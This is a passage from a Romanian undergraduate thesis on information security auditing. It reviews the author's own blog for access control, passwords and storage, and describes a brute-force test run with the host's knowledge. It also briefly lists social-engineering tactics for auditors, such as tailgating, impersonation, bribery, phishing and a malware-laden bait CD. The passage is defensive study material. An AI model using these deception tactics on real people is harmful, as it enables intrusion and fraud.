În cazul blogului am verificat acest lucru executând un test de penetrare a securității de tip brute force. Rezultatul a fost suspendarea temporară a site-ului datorită supra încărcării sistemului. (Deoarece înștiințasem firma că voi efectua teste asupra blogului, menționând faptul că le voi folosi în lucrarea de licență, contul a fost reactivat și nu s-a luat nici o măsură legală împotriva mea. Conform normelor interne ale firmei, un atac de genul celui făcut de mine este raportat Poliției.) Contul de hosting oferă inclusiv serviciu de poștă electronică. Pentru a preveni situațiile în care un utilizator de poștă electronică să ocupe spațiul alocat pe server, fiecăruia i se poate atribui o cotă parte din spațiul pe disc, valoarea inițială pentru un astfel de cont fiind de 10 MB.

În cazul unei firme se verifică dacă există metode de restricționare a accesului unui utilizator în cazul în care acesta compromite sistemul informatic. Totodată, se verifică dacă îi este alocat fiecăruia o anumită parte din resursele partajate ale sistemului („quota”) sau dacă sunt desemnate zone specifice de anumite dimensiuni (partiții pe hard disc) fiecărui departament.

În unele cazuri trebuie limitată și maniera în care un utilizator se conectează la sistem.

Se verifică modul de autentificare a utilizatorilor. În funcție de modul în care se

face autentificarea se face o analiză a rezultatelor cu eventuale propuneri de securizare a accesului prin diverse metode. Dacă se folosește un terminal de autentificare, trebuie verificat că acesta este securizat. Dacă există acces direct prin protocoale de genul telnet, trebuie rulate servicii de genul tcp_wrappers sau identd pentru a se verifica faptul că utilizatorul se conectează de la sistemul de la care pretinde că se află.

Trebuie ținute loguri cu activitatea utilizatorului, timpul conexiunii (data și durata), locul de unde s-a logat, aplicațiile pe care le-a rulat, comenzile, etc.

Menționat și anterior, se verifică existența logurilor de sistem și conținutul acestora (se verifică ce anume înregistrează din activitatea efectuată).

3.5. Securitatea stocării datelor

De obicei securitatea stocării datelor nu este văzută ca un risc, deoarece oamenii au sau nu acces la acestea. Problema este că există multe modalități prin care se poate obține ilegal acces la aceste date, iar administratorul de sistem trebuie să fie conștient de ele.

Utilizatorul are acces doar la ce este relevant muncii lor?

În cazul blogului, contul de găzduirea are acces doar la partea lui de resurse. Îi este stabilit o anumită cantitate de date (5GB), un anumit număr de conturi per serviciu (de exemplu poate utiliza doar o bază de date MySql) și nu are acces la setările sistemului pe care se află.

Figura 9 Setările accesibile cPannel

Contul utilizatorului este limitat? Are drept de administrator pe sistemul pe care lucrează?

Se verifică dacă utilizatorii pot accesa diverse zone de stocare a datelor cu drept de administrator. În mod obișnuit, fiecare utilizator are un cont de user fără drepturi asupra fișierelor altora (decât cel mult în citire) și cu acces parțial la anumite resurse (memorie RAM utilizabilă, etc).

Administratorul este la curent cu politica de drepturi ale utilizatorilor?

Deși pare absurdă întrebarea, sunt multe cazuri în care administratorul de sistem nu știe exact ce anume are nevoie un utilizator sau nu știe să configureze corespunzător acest lucru. Se verifică dacă administratorii cunosc drepturile de acces ale utilizatorilor și dacă cunosc modul de aplicare a politicilor de securitate în funcție de acestea precum și dacă știu ce anume se întâmplă în urma aplicării acestor politici legat de accesul fiecăruia.

3.6. Parolele

Parola este componenta centrală a oricărei scheme de securitate. De aceea are un domeniu separat special pentru verificarea securității acesteia.

Parolele sunt simple sau complexe? Există conturi fără parolă?

Atât pe contul de hosting cât și pe conturile de pe blog sunt folosite parole de minim 12 caractere, conținând litere mici, litere mari, numere și caractere speciale. Nu

există acces tip guest decât pentru vizualizarea conținutului blogului. Comentariile utilizatorilor trebuie să fie aprobate înainte de a fi afișate pe site și pot fi făcute după introducerea unui cod anti robot (captcha).

În cazul unei firme se verifică dacă sunt definite clar conturile de acces pe un sistem informatic. Fiecare utilizator trebuie să aibă o parolă complexă. În nici un caz nu trebuie să existe conturi de tip guest sau conturi care nu necesită o formă de autentificare. Unele sisteme de operare au conturi de guest preactivate chiar dacă nu sunt vizibile (de exemplu în Windows). Se verifică dacă există astfel de conturi și dacă au fost blocate sau șterse.

Există o politică de schimbare a parolelor?

În cazul blogului parolele se schimbă din proprie inițiativă a posesorilor o dată la 2 luni. Nu este stabilită o procedură de forțare a modificării periodice a parolei.

În cazul unei organizații se verifică dacă parolele sunt temporare sau permanente. În cazul parolelor temporare se verifică perioada de timp în care expiră o parolă și modul în care este obținută alta. Trebuie să existe o politică de schimbare a parolelor. Utilizatorul nu trebuie să țină o parolă mai mult de câteva luni consecutiv, iar la momentul schimbării nu trebuie ca parola nouă să fi fost folosită în ultimele 3 cicluri.

Utilizatorului trebuie să i se interzică notarea parolei sau stocarea ei într-un loc care poate fi accesat de persoane neautorizate. Se preferă memorarea acesteia.

Administratorul blogului păstrează parola criptat. Pentru aceasta folosește un manager de parole (KeePass – http://keepass.info/index.html, program open source) care păstrează fișierul criptat AES cu o funcție hash SHA-256. Același program este folosit și pentru generarea parolelor.

Figura 10 Generarea parolei în KeePass, în Windows (stânga) și adăugarea unei parole în lista criptată, în Linux (dreapta)

Figura 11 Opțiuni privind criptarea fișierului care conține parolele

În cazul organizației, la fiecare sistem informatic auditat se verifică dacă există stickere cu parola lipite pe monitor / tastatură sau în alte locuri sau dacă parola nu este scrisă pe caietul de lucru al utilizatorului.

3.7. Factorul uman

Datorită faptului că securitatea depinde și de oameni nu doar de tehnologie (de multe ori chiar mai mult decât am vrea să credem), ingineria socială este una dintre cele mai periculoase metode de atac. Prin acest mod se va observa cât de bine respectă angajații anumite politici de securitate. Se pot folosi următoarele tipuri de inginerie socială:

“Piggybacking”: Auditorul se va îmbrăca în aceleași tipuri de haine pe care le poartă angajații și se așează la intrarea în incintă. Acesta va aștepta până când un angajat vine și descuie ușa, apoi intră după el. Acest scenariu este folosit pentru a testa dacă un angajat permite accesul persoanelor neavizate / necunoscute în interiorul incintelor dotate cu sisteme de acces pe bază de cod/cartelă/cheie, etc. Această metodă este ușor aplicabilă firmelor cu mulți angajați.

“Computer technician”: Auditorul încearcă să convingă un angajat că este fie de la departamentul service, fie de la o firmă specializată în depanarea calculatoarelor. Scopul acestuia este să-i sustragă dispozitivul în care sunt prezente informațiile confidențiale.

“Bribery”: Auditorul încearcă să mituiască un angajat, oferindu-i o sumă mare de bani pentru anumite informații.

“Phishing”: Trimiterea de mesaje e-mail false, care par a veni din partea unor persoane oficiale. Scopul este de a obține informații confidențiale. De multe ori persoanele nu verifică proveniența email-urilor oferind datele personale.

“Payroll”: Auditorul lasă intenționat la vedere un CD etichetat în așa fel încât să stârnească curiozitatea unui angajat (“Lista salarii angajați”, “Lista promovări an curent”, etc). CD-ul conține o aplicație malițioasă care o dată rulată va putea instala un virus/troian, etc.

Factorul uman nu a putut fi apreciat la auditarea blogului.

Concluzii

Pe post de parte practică am executat un audit de securitate al unui blog în paralel cu explicații despre modul în care întrebările sunt aplicate unei firme. Din fericire pot spune că am un blog relativ sigur. Spun relativ deoarece am folosit un software oficial pentru o testare oficială. Resursele pentru cineva care dorește să penetreze securitatea unui sistem informatic sunt practic nelimitate.

Rezultatele testului de penetrare au evidențiat faptul că blogul nu e vulnerabil la atacuri tip sql injection sau brute force. Testul a evidențiat și modul de reacție al firmei cu care este încheiat contractul de găzduire pentru blog. Politica lor de securitate e simplă. În momentul în care un cont este atacat și se produce o supraîncărcare a sistemului pe care se află este suspendat respectivul cont pentru a preveni indisponibilitatea altor conturi existente pe acel sistem, sistemul informatic fiind unul partajat.

Unele puncte ale auditului nu le-am putut evalua.

Rezultatele auditului sunt următoarele, introduse sub forma unui raport de audit.

Raport de audit

Perioada efectuării auditului informatic: 11.02.2014 – 11.03.2015

Data efectuării testului de penetrare: 11.02.2015.

* Deduse din declarația firmei de hosting pe site-ul propriu.

Dacă ar trebui să întocmesc FIAP-uri15 după acest audit / recomandări în urma auditului, printre propuneri se vor regăsi următoarele:

Studierea posibilității schimbării firmei de găzduire cu una care are o politică mai maleabilă și orientată pe binele ambelor părți contractuale. Blocarea contului la primele semne de atac nu este o soluție viabilă pentru un site de producție.

Studierea posibilității de închiriere a unui server dedicat sau de achiziționare pe componente a acestuia. Deși este o soluție scumpă (un server dedicat înseamnă cel puțin 200 de euro iar un sistem informatic achiziționat costă cam 300 de euro) este o posibilă soluție viabilă datorită gradului de securitate pe care îl poate oferi manipularea directă a sistemului informatic și, eventual, subînchirierea de spațiu pe acesta contra cost pentru acoperirea cheltuielilor.

Schimbarea parolei ar trebui să fie forțată la perioade fixe. Deși programul

KeePass are opțiuni de validare periodică a parolei, acesta nu poate influența schimbarea parolei pe server.

15 FIAP – fișa de identificare și analiză a problemei

Păstrarea în sistem criptat a parolelor este o practică bună. Aceasta însă devine o adevărată pacoste dacă nu este la îndemână sistemul informatic pe care rulează acest program (de exemplu în concediu, fără laptop). În astfel de cazuri o parolă compusă din caractere mici și mari, numere și simboluri care e ținută minte este mai practică (și poate fi ușor memorabilă dacă se folosește un anumit sistem de întocmire a ei, de exemplu „MARIbnaUS43!!”.

În cazul unei firme auditul nu mai este atât de simplu precum la un blog. O mulțime de factori sunt luați în calcul, de la securitatea fizică a locației unde se află sistemul informatic la factorul uman implicat, respectiv utilizatorii. Recentele atacuri executate de hackeri precum TinKode au arătat că sistemele informatice nu sunt atât de sigure precum par. Scandalul Wikileaks a evidențiat și mai mult cât de vulnerabile pot fi informațiile și mai ales ce efect pot produce acestea dacă sunt făcute publice.

Trebuie menționat că în timp ce organizațiile evoluează și structurile lor de securitate se schimbă. Ținând cont de acest fapt, auditul de securitate informatică nu se efectuează o singura dată, ci este un efort continuu pentru a îmbunătăți protecția datelor. Auditul măsoară politica de securitate a organizației și oferă o analiză a eficienței acestei politici în contextul structurii organizației, obiectivele și activitățile acesteia.

Auditul trebuie să se bazeze pe eforturile anterioare de audit pentru a ajuta la rafinarea politicii de securitate și pentru a corecta deficiențele acesteia, care sunt descoperite prin intermediul procesului de audit.

Chiar dacă instrumentele sunt o parte importantă a procesului de audit, auditul este mai puțin despre utilizarea instrumentelor cele mai noi în evaluarea vulnerabilității și mai mult despre utilizarea unor date organizate, consecvente, corecte și analiza acestora pentru a produce rezultate care pot fi corectate.

În lucrarea mea nu am făcut altceva decât o sintetizare a principalelor metode de atac informatic și prevenire a acestuia într-un sistem informatic, fie calculator personal sau server.

Metodele sunt mult mai multe și se dezvoltă pe zi ce trece tot mai mult.

Dar toate au două mari puncte comune: Administratorul de rețea și Utilizatorul.

De aceștia depind majoritatea vulnerabilităților și cele mai mult atacuri s-au efectuat pe baza informațiilor adunate de la utilizatori creduli sau neinițiați în minimul de securitate necesar protejării datelor dintr-un sistem informatic sau au avut succes datorită securizării defectuoase a rețelei sau a politicilor de securitate prost implementate pe sistemele informatice

Bibliografie

[1] Lect.univ.dr. Dominic Bucerzan – Securitatea informației economice în rețele de calculatoare

[2] Suport de curs – Criptografie și securitatea informației – Lect.univ.dr. Dominic Bucerzan, Facultatea de Științe Exacte / UAVArad

[3] Prof. univ.dr. Constantin Popescu – Curs, Specializarea Informatica, anul III, An univ. 2009/ 2010 ( http://webhost.uoradea.ro/cpopescu/curs-si.html )

[4]Adrian Munteanu –Auditul sistemelor informatice, suport de curs, F.E.A.A., Universitatea “Alexandru Ioan Cuza” Iași

[5] Ing. Florin Baciu, Securitatea calculatoarelor, Editura IESPU FOCUS București, 2003, p.42

[6] Dr. Maxim Dobrinoiu – Infracțiuni în domeniul informatic, București 2006

[7] Petre Rău – Infracționalitatea pe calculator

[8] V. Patriciu – Criptografia și securitatea rețelelor de calculatoare cu aplicații în C și Pascal , Editura Tehnică, București 1994

[9] Ediție în limba română a cadrului de referință COBIT 4.1

[10]Amor, D., The E-Business (R)evolution, Living and Working in an Interconnected World, Hewlett-Packard Professional Books, 2000

Resurse online utilizate:

[web1] https://www.isaca.org/ și http://isaca.ro (accesare 24.02.2015)

[web2] http://en.wikipedia.org/wiki/Computer_Misuse_Act (accesare 03.02.2015)

[web3] http://en.wikipedia.org/wiki/BS_7799 (accesare 03.02.2015)

[web4] http://www.cert-ro.eu/ (accesare 23.02.2015)

[web5] http://en.wikipedia.org/wiki/Denial-of-service_attack (accesare 03.02.2015)

[web6] http://en.wikipedia.org/wiki/Exploit_%28computer_security%29 (accesare 03.02.2015)

[web7] http://en.wikipedia.org/wiki/Crimeware (accesare 03.02.2015)

[web8] http://hackpedia.info/ (accesare 26.02.2015)

[web9] http://robyte.tripod.com/pgp.htm (accesare 14.03.2015)

[web10] http://www.orniss.ro/ro/prezentare.html (accesare 21.01.2015)

[web11] http://ro.wikipedia.org/wiki/Informatie (accesare 03.02.2015)

[web12] http://rstcenter.com/forum/15572-dictionar-brute-force-exemplu-hi5.rst (accesare 07.02.2015)